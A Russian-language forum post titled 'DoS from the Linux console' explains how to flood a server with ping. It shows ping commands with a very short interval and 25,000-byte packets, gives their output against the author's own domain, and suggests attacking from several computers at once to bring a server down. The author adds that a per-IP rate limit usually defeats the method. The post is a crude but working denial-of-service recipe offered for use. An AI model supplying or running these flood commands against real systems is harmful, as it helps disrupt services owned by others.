• Уменьшение отступа

    Обратная связь

    (info@ru-sfera.pw)

DoS из консоли для Linux.

  • Автор темы Maxim Next
  • Дата начала

M

Maxim Next

Гость
Это делается довольно просто с помощью команды ping.
Давайте введём в консоль ping -h
получаем вот такой мануал:
user@group:~$ ping -h
Usage: ping [-aAbBdDfhLnOqrRUvV] [-c count] [-i interval] [-I interface]
[-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
[-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
[-w deadline] [-W timeout] [hop1 ...] destination

Что мы можем тут сделать? Ну, первое, что можно сделать - это уменьшить интервал. Как видно из мануала это команда -i. Интервал измеряется в мс. Давайте укажем интервал 0.0001
Давайте введём и посмотрим, что произойдёт. Вводить эту команду нужно из-под админа (супер-пользователя). (maximxx.no-ip.biz мой домен)
user@group:/# ping -i 0.0001 maximxx.no-ip.biz
PING maximxx.no-ip.biz (188.232.204.27) 56(84) bytes of data.
64 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=1 ttl=64 time=0.326 ms
64 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=2 ttl=64 time=0.206 ms
64 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=3 ttl=64 time=0.195 ms
...
64 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=157 ttl=64 time=0.260 ms
64 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=158 ttl=64 time=0.317 ms
64 bytes from 188.232.204.27: icmp_seq=159 ttl=64 time=0.299 ms

--- maximxx.no-ip.biz ping statistics ---
159 packets transmitted, 159 received, 0% packet loss, time 190ms

rtt min/avg/max/mdev = 0.186/0.230/0.326/0.036 ms, ipg/ewma 1.202/0.254 ms

Что мы видим? Что за 190 мс отправилось 159 пакетов. Это уже хорошо, но не достаточно, потому что любой нормальный сервер выдержит такой поток.
Но теперь мы можем ввестипараметр -s. Он отвечает за размер пакета. Стандартно пакет для пинга не большой (56) и служит только для проверки соединения. Но если мы увеличим его размер, то это создаст серьёзную нагрузку на сервер. Давайте укажем размер 25000.

user@group:/# ping -i 0.0001 -s 25000 maximxx.no-ip.biz
PING maximxx.no-ip.biz (188.232.204.27) 25000(25028) bytes of data.
25008 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=1 ttl=64 time=5.07 ms
25008 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=2 ttl=64 time=5.03 ms
25008 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=3 ttl=64 time=5.05 ms
...
25008 bytes from dynamicip-188-232-204-27.pppoe.omsk.ertelecom.ru (188.232.204.27): icmp_seq=1000 ttl=64 time=5.12 ms

--- maximxx.no-ip.biz ping statistics ---
1000 packets transmitted, 1000 received, 0% packet loss, time 6368ms
rtt min/avg/max/mdev = 4.992/5.065/5.210/0.098 ms, ipg/ewma 6.375/5.059 ms

Вот это уже серьёзно. Не слишком, но канал хорошо забивает. Если сразу с нескольких компьютер ударить, то может получится положить сервер.
Добавлю только то, что это не очень эффективный и редко срабатывает, потому что на сервере можно поставить ограничение на количество коннектов в секунду от одного ip.
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
6 068
Репутация
8 176
Автор темы Похожие темы Форум Ответы Дата
M СТАТЬИ И УРОКИ ПО ИССЛЕДОВАНИЮ ЗАЩИТЫ 14
Верх Низ